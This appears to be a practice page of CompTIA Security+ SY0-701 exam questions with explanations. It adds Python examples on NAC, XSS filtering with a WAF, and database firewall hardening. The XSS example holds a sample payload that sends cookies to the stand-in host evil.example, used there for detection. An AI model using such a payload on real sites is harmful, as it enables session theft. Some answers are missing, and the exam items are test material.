Practice Free SY0-701 Exam Online Questions
Which of the following is a benefit of vendor diversity?
- A . Patch availability
- B . Zero-day resiliency
- C . Secure configuration guide applicability
- D . Load balancing
A company is changing its mobile device policy. The company has the following requirements:
Company-owned devices
Ability to harden the devices
Reduced security risk
Compatibility with company resources
Which of the following would best meet these requirements?
- A . BYOD
- B . CYOD
- C . COPE
- D . COBO
C
Explanation:
COPE (Corporate-Owned, Personally Enabled) devices are purchased and managed by the company, so the organization can enroll them in MDM, harden the configuration, and guarantee compatibility with corporate resources, while still permitting limited personal use. That combination of company ownership, central control, and reduced risk is what the requirements describe.
Reference: CompTIA Security+ SY0-701 Study Guide, Domain 3: Security Architecture, Section: "Mobile Device Deployment Models".
A security analyst is prioritizing vulnerability scan results using a risk-based approach.
Which of the following is the most efficient resource for the analyst to use?
- A . Business impact analysis
- B . Common Vulnerability Scoring System
- C . Risk register
- D . Exposure factor
B
Explanation:
The Common Vulnerability Scoring System (CVSS) is a standardized framework for rating the severity of vulnerabilities. It produces a numerical base score from 0.0 to 10.0 derived from metrics such as attack vector, attack complexity, privileges required, user interaction, scope, and confidentiality/integrity/availability impact, which lets an analyst rank a scan's findings quickly and consistently. In practice the base score is a starting point: temporal and environmental metrics, known exploitation, and asset criticality refine the order, but CVSS is the most efficient single resource for initial prioritization.
Business impact analysis (A) identifies critical business functions and recovery priorities but does not rate individual vulnerabilities.
Risk register (C) tracks identified risks, owners, and treatments but does not classify or score vulnerabilities.
Exposure factor (D) is a quantitative risk-assessment input (the percentage of asset value lost in an incident) and is not an industry standard for vulnerability prioritization.
Reference: CompTIA Security+ SY0-701 Official Study Guide, Risk Management domain.
The private key for a website was stolen, and a new certificate has been issued.
Which of the following needs to be updated next?
- A . SCEP
- B . CRL
- C . OCSP
- D . CSR
After a security incident, a systems administrator asks the company to buy a NAC platform.
Which of the following attack surfaces is the systems administrator trying to protect?
- A . Bluetooth
- B . Wired
- C . NFC
- D . SCADA
B
Explanation:
The correct answer is Wired because Network Access Control (NAC) platforms are primarily designed to control and secure access to an organization’s wired and wireless network infrastructure, with a strong emphasis on enforcing policies at the point where devices connect to the network. In the context of the Security+ SY0-701 objectives, NAC is a key architectural control used to reduce attack surface by preventing unauthorized, unmanaged, or noncompliant devices from gaining network access.
A NAC solution works by authenticating and evaluating devices before granting them access to network resources. This commonly includes checking device identity, credentials, patch levels, antivirus status, and compliance with security policies. For wired networks, NAC enforces controls at switch ports using technologies such as 802.1X, ensuring that only approved devices can connect to internal networks. This directly protects the wired attack surface by stopping threats like rogue devices, compromised laptops, or unauthorized systems from plugging into an Ethernet port and gaining access.
Option A, Bluetooth, is incorrect because NAC platforms do not directly manage short-range personal area network technologies.
Option C, NFC, is also incorrect because NFC is typically used for proximity-based authentication or payments and is outside the scope of NAC enforcement.
Option D, SCADA, refers to industrial control systems, which require specialized security controls and are not the primary target of standard enterprise NAC solutions.
The SY0-701 study guide highlights NAC as a preventive and detective control that supports zero trust principles by verifying devices before allowing access. By securing the wired network attack surface, NAC significantly reduces lateral movement opportunities and limits the impact of compromised or unauthorized endpoints following a security incident.
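The authenticate-then-assess flow described above, as an added example that is not part of the study guide or any NAC vendor's code: a toy policy engine that models what a NAC server decides when a device appears on a switch port. Endpoints, VLAN numbers, the 30-day patch threshold, and the sample devices are all constructed assumptions; the RADIUS attribute names are the standard ones used for dynamic VLAN assignment.

```python
"""Toy NAC authorization engine: 802.1X authentication, then posture check,
then a RADIUS-style VLAN assignment for the switch port."""
from dataclasses import dataclass, field
from typing import List, Optional

PRODUCTION_VLAN = 10
QUARANTINE_VLAN = 999          # remediation-only network (patch and AV servers reachable)
MAX_PATCH_AGE_DAYS = 30        # assumed policy threshold


@dataclass
class Endpoint:
    """What the NAC server learns from the supplicant and the posture agent."""
    mac: str
    identity: Optional[str]        # EAP identity; None when nothing answered the EAP request
    cert_chain_valid: bool         # EAP-TLS device certificate chains to the corporate CA
    patch_age_days: Optional[int]  # None when the posture agent is absent
    av_running: bool


@dataclass
class Decision:
    action: str                    # "permit", "quarantine" or "deny"
    vlan: Optional[int]
    reasons: List[str] = field(default_factory=list)

    def radius_attributes(self) -> dict:
        """Attributes a real NAC server would return in Access-Accept/Access-Reject."""
        if self.action == "deny":
            return {"Reply-Message": "; ".join(self.reasons)}
        return {
            "Tunnel-Type": "VLAN",
            "Tunnel-Medium-Type": "IEEE-802",
            "Tunnel-Private-Group-ID": str(self.vlan),
        }


def authorize(ep: Endpoint) -> Decision:
    # Step 1: authentication. No supplicant, or an untrusted certificate, means the
    # port stays closed and the device never touches the wired network.
    if ep.identity is None or not ep.cert_chain_valid:
        return Decision("deny", None, ["802.1X authentication failed"])

    # Step 2: posture. Authenticated but non-compliant devices land in a quarantine
    # VLAN so they can remediate without reaching production.
    reasons = []
    if ep.patch_age_days is None:
        reasons.append("posture agent missing")
    elif ep.patch_age_days > MAX_PATCH_AGE_DAYS:
        reasons.append(f"patches {ep.patch_age_days} days old (limit {MAX_PATCH_AGE_DAYS})")
    if not ep.av_running:
        reasons.append("endpoint protection not running")
    if reasons:
        return Decision("quarantine", QUARANTINE_VLAN, reasons)

    return Decision("permit", PRODUCTION_VLAN, [f"{ep.identity} authenticated and compliant"])


# Constructed sample endpoints plugging into switch ports (hypothetical data).
SAMPLE_ENDPOINTS = [
    Endpoint("00:11:22:33:44:01", "laptop-0423.corp.example", True, 7, True),
    Endpoint("00:11:22:33:44:02", "laptop-0187.corp.example", True, 61, True),
    Endpoint("00:11:22:33:44:03", None, False, None, False),                   # rogue box, no supplicant
    Endpoint("00:11:22:33:44:04", "laptop-0099.corp.example", False, 3, True),  # self-signed certificate
]

if __name__ == "__main__":
    for ep in SAMPLE_ENDPOINTS:
        d = authorize(ep)
        print(ep.mac, d.action, d.vlan, d.reasons)
```

The ordering matters: posture is only evaluated after identity is proven, so an unauthenticated device can never "pass" by claiming to be patched, and a compliant device with a bad certificate is still refused.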
An accounting employee recently used software that was not approved by the company.
Which of the following risks does this most likely represent?
- A . Unskilled attacker
- B . Hacktivist
- C . Shadow IT
- D . Supply chain
C
Explanation:
Shadow IT refers to employees using software or services without official approval, often introducing security risks due to lack of control, monitoring, or compliance. This can lead to vulnerabilities, data leakage, or policy violations.
Unskilled attacker (A) and hacktivist (B) are threat actor types; supply chain (D) refers to risks from external partners or vendors, not internal unauthorized software usage.
Reference: CompTIA Security+ Study Guide, Chapter 16; shadow IT is highlighted in the Security Program Management and Threats domains for its risk implications.
A security analyst is reviewing the security of a SaaS application that the company intends to purchase.
Which of the following documentations should the security analyst request from the SaaS application vendor?
- A . Service-level agreement
- B . Third-party audit
- C . Statement of work
- D . Data privacy agreement
B
Explanation:
A third-party audit provides an independent assessment of the SaaS vendor's security controls, compliance, and practices. This documentation helps verify that the vendor meets security standards and follows best practices.
Reference: CompTIA Security+ SY0-701 Official Study Guide, Domain 5.3: "Third-party audits offer independent verification of vendor security controls."
Exam Objectives 5.3: “Summarize third-party risk management concepts.”
An attacker uses XSS to compromise a web server.
Which of the following solutions could have been used to prevent this attack?
- A . NGFW
- B . UTM
- C . WAF
- D . NAC
C
Explanation:
The best answer is C. WAF.
XSS (Cross-Site Scripting) is a web application attack that injects malicious scripts into web content served to other users. A WAF (Web Application Firewall) is specifically designed to inspect, filter, and block malicious HTTP traffic targeting web applications (including HTTPS once TLS is terminated at or before the WAF). It can detect and block common attacks such as XSS, SQL injection, and other application-layer threats. Note that a WAF is a compensating control: the root fix for XSS is contextual output encoding and input validation in the application itself, with the WAF catching what the code misses.
Why the other options are incorrect:
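As an added example that is not from the exam or study guide, the following shows the two halves of the XSS picture in one place: the vulnerable render beside the hardened one (output encoding, the application-side fix), and a minimal WAF-style request inspector that decodes the query string the way the server would before matching signatures. The request strings, the `evil.example` host, and the signature list are constructed for illustration; a real WAF rule set such as the OWASP Core Rule Set is far larger.

```python
"""Reflected XSS: vulnerable render beside hardened render, plus a tiny
WAF-style request inspector of the kind that would have blocked the attack."""
import html
import re
from urllib.parse import unquote_plus

# --- application side ---------------------------------------------------------

def render_search_vulnerable(query: str) -> str:
    """String concatenation straight into HTML: attacker markup becomes live markup."""
    return f"<p>Results for: {query}</p>"


def render_search_hardened(query: str) -> str:
    """Contextual output encoding: the browser renders text, never markup."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


# --- WAF side (compensating control in front of the web server) ---------------

# Assumed signature set for illustration; real rule sets are far broader.
XSS_SIGNATURES = [
    re.compile(r"<\s*script", re.I),
    re.compile(r"javascript\s*:", re.I),
    re.compile(r"\bon[a-z]+\s*=", re.I),          # onerror=, onload=, ...
    re.compile(r"<\s*(img|svg|iframe)\b", re.I),
]


def waf_inspect(raw_query_string: str):
    """Return (blocked, matched_pattern). Decodes the way the server will, so
    %3Cscript%3E does not slip past a rule written against '<script'."""
    decoded = unquote_plus(raw_query_string)
    for sig in XSS_SIGNATURES:
        if sig.search(decoded):
            return True, sig.pattern
    return False, None


def query_value(raw_query_string: str) -> str:
    """Value of the single 'q=' parameter, decoded as the application would see it."""
    return unquote_plus(raw_query_string.partition("=")[2])


# Constructed sample requests (hypothetical).
BENIGN = "q=quarterly+report"
PAYLOAD = ("q=%3Cscript%3Edocument.location%3D%27http%3A//evil.example/%27"
           "%2Bdocument.cookie%3C/script%3E")
ENCODED_IMG = "q=%3Cimg+src%3Dx+onerror%3Dalert(1)%3E"

if __name__ == "__main__":
    for raw in (BENIGN, PAYLOAD, ENCODED_IMG):
        blocked, rule = waf_inspect(raw)
        print(raw[:40], "->", f"BLOCKED by {rule}" if blocked else "allowed")
    print(render_search_vulnerable(query_value(PAYLOAD)))
    print(render_search_hardened(query_value(PAYLOAD)))
```

The `\bon[a-z]+\s*=` rule illustrates the WAF trade-off: it catches event-handler injection but will also block a legitimate parameter such as `option=`, which is why WAF rules are tuned per application and why the encoding fix in `render_search_hardened` remains the control that actually closes the bug.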
Which of the following will harden access to a new database system? (Select two)
- A . Jump server
- B . NIDS
- C . Monitoring
- D . Proxy server
- E . Host-based firewall
- F . WAF
A,E
Explanation:
Hardening access to a new database system requires implementing controls that restrict and secure how administrators and applications connect to the database. A jump server (A) is a hardened intermediary system used to manage access to sensitive systems such as databases. By forcing administrators to authenticate through a controlled, monitored jump host instead of connecting directly, organizations reduce attack surfaces and prevent unauthorized lateral movement. Security+ SY0-701 identifies jump servers as critical in securing high-value systems.
A host-based firewall (E) provides system-level traffic filtering directly on the database server. It allows only trusted IPs, ports, and services to communicate with the database, significantly reducing exposure. This is an essential hardening measure because databases should only accept connections from specific application servers or administrative hosts.
NIDS (B) monitors traffic but does not harden access. Monitoring (C) provides visibility but does not restrict access. A proxy server (D) is not typically used for database access. A WAF (F) protects web applications, not internal database systems.
Thus, A (Jump server) and E (Host-based firewall) are the correct hardening controls.
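The check a practitioner would want after reading the two correct answers, as an added example that is not part of the study guide: audit a database host's firewall accept rules against the intended allowlist (database port only from the application subnet and the jump host, SSH only from the jump host) and emit the matching nftables chain. The port, subnets, jump-host address, and the sample ruleset are constructed assumptions.

```python
"""Audit a host-based firewall allowlist for a database server and render the
intended nftables input chain. Rules are modelled as dicts (constructed sample)."""
import ipaddress
from typing import Dict, List

DB_PORT = 5432                                       # assumed PostgreSQL
SSH_PORT = 22
APP_TIER = ipaddress.ip_network("10.20.0.0/24")      # assumed application subnet
JUMP_HOST = ipaddress.ip_network("10.0.1.5/32")      # assumed hardened jump server

# Who may reach which port. Anything else should be dropped by the default policy.
ALLOWLIST = {
    DB_PORT: [APP_TIER, JUMP_HOST],
    SSH_PORT: [JUMP_HOST],
}


def _covered(src: ipaddress.IPv4Network, nets) -> bool:
    """True when src lies entirely inside one of the allowlisted networks."""
    return any(src.version == net.version and src.subnet_of(net) for net in nets)


def audit_rules(rules: List[Dict]) -> List[str]:
    """Return one finding per ACCEPT rule that exceeds the allowlist."""
    findings = []
    for r in rules:
        if r["action"] != "accept":
            continue
        src = ipaddress.ip_network(r["src"], strict=False)
        allowed = ALLOWLIST.get(r["dport"])
        if allowed is None:
            findings.append(f"port {r['dport']} accepted from {src} but is not an allowlisted service")
        elif not _covered(src, allowed):
            findings.append(f"port {r['dport']} accepted from {src}, allowed only from "
                            f"{[str(n) for n in allowed]}")
    return findings


def render_nftables(default_policy: str = "drop") -> str:
    """Emit an nftables input chain from the allowlist (default deny)."""
    lines = [
        "table inet dbhost {",
        "  chain input {",
        f"    type filter hook input priority 0; policy {default_policy};",
        "    ct state established,related accept",
        "    iif lo accept",
    ]
    for port, nets in ALLOWLIST.items():
        for net in nets:
            lines.append(f"    ip saddr {net} tcp dport {port} accept")
    lines += ["  }", "}"]
    return "\n".join(lines)


# Constructed sample ruleset as found on the new DB host before hardening.
SAMPLE_RULES = [
    {"action": "accept", "proto": "tcp", "dport": 5432, "src": "10.20.0.0/24"},
    {"action": "accept", "proto": "tcp", "dport": 5432, "src": "0.0.0.0/0"},    # wide open
    {"action": "accept", "proto": "tcp", "dport": 22,   "src": "10.20.0.0/24"},  # SSH bypasses jump host
    {"action": "accept", "proto": "tcp", "dport": 22,   "src": "10.0.1.5/32"},
    {"action": "accept", "proto": "tcp", "dport": 8080, "src": "10.0.0.0/8"},    # leftover service
    {"action": "drop",   "proto": "tcp", "dport": 5432, "src": "0.0.0.0/0"},
]

if __name__ == "__main__":
    for finding in audit_rules(SAMPLE_RULES):
        print("FINDING:", finding)
    print(render_nftables())
```

The two controls reinforce each other: the SSH rule restricted to the jump host is what forces administrators through the monitored hop, and the database rule restricted to the application subnet is what stops a compromised workstation elsewhere on the network from talking to the listener directly.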
